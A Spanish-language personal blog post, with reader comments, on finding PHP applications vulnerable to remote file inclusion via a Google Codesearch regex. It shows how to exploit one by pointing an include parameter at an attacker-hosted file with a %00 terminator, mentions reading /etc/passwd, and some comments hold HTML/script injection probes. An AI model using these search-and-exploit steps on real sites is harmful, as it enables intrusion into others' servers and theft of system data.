Sergio Álvarez (xergio)

Escrito 355

Buscando aplicaciones vulnerables a PHP Injection con Google Codesearch

El otro día en el trabajo probamos Jordi y yo Google Codesearch. Esta es una herramienta diseñada para programadores, para que encontremos cosas en el código fuente de los archivos de aplicaciones indexados por Google. Aprovechando que lo comentan en Dirson también y preguntan por otras curiosidades que hayamos encontrado... ahí va una que incluso nosotros probamos.

Si usamos la siguiente búsqueda:

(include|require)(_once)?\ ?\(?\ ?\$_POST

O cambiando POST por GET, nos saldrán un puñado de aplicaciones que hacen un include "a pelo" de lo que le llega por URL o POST data. Algunos direis "bah, si luego incluye un archivo de su servidor...", pues da igual, se puede evitar eso si se usa Apache :P

Es muy sencillo, la solución la tiene la wikipedia. Su por ejemplo la víctima tiene lo siguiente...

include($_GET['seccion'] . '/un_archivo.php');

... nosotros solo tendremos que crear un archivo .txt con contenido PHP que será ejecutado luego en el servidor de la víctima. Yo probé lo siguiente:

<?php phpinfo(); ?>

Eso solamente muesta la información del PHP del servidor de la víctima. Colgamos eso de nuestro servidor o un equipo accesible desde la red y nosvamos al navegador:

http://dirección.de.la.victima.com/archivo_vulnerable.php ?seccion=http://nuestra.dirección.com/archivo.txt%00

Es importante la terminación %00, es la clave de esto.

Eso "incluirá" nuestro código, y lo ejecutará directamente... imaginaros que ne vez de un phpinfo(); lo que hago es mandar un "cat /etc/passwd" :P

En fin... estuvo divertido el experimento, nos llevó apenas 10 minutillos y aprendimos algo muy importante :D

Niñas | La lluna

3 comentarios

Páginas de comentarios archivados: 1

Jabber status Guti comentó:

[Avatar]
  • #1
  • 29-10/22:37
Sorprendente la cantidad de resultados que aparecen...

Jabber status '<FONT STYLE="FONT-SIZE:150;"> comentó:

[Avatar]
  • #2
  • 14-11/05:53
></TEXTAREA>?>'<FONT STYLE="FONT-SIZE:150;">S'.com

Bueno veras, me parece muy buen articulo, pero me gustaria que espliques mas a fondo... para lograr cosas como la que ves que aqui intento hacer.

Jabber status '?php phpinfo; ?>' comentó:

[Avatar]
  • #3
  • 14-11/05:55
<?php phpinfo; ?>

Yo otra vez... xD perdon. je.

Páginas de comentarios archivados: 1

Deja un comentario

Pulsa en los títulos para ver información sobre cómo comentar.

Autocompletado de nicks

Todos los campos del formulario son opcionales menos el del PIN.

Usa el tabulador para autocompletar los nicks de otros comentaristas.

Si escribes @ y pulsas la tecla tabulador varias veces podrás recorrer la lista de nicks usados

Y si escribes # (almoadilla) y número (Ej.: #5) se substituirá directamente el nick del comentario correspondienmte al pulsar el tabulador.

Tags HTML permitidos

Tags: a, strong, b, em, u, code, cite.

El tag a admite la propiedad href="..." para indicar la dirección.

Los tags también tienen autocompletado (al igual que los nicks). Para usarlos se pone por ejemplo strong + TABULADOR.

Formulario para comentar

Cargando...

Todo el contenido bajo el dominio XERGIO.NET está sujeto a la licencia Creative Commons con las condiciones BY-SA. Web estandarizada en XHTML 1.0, CSS 2, RSS 2 y Atom 1.0.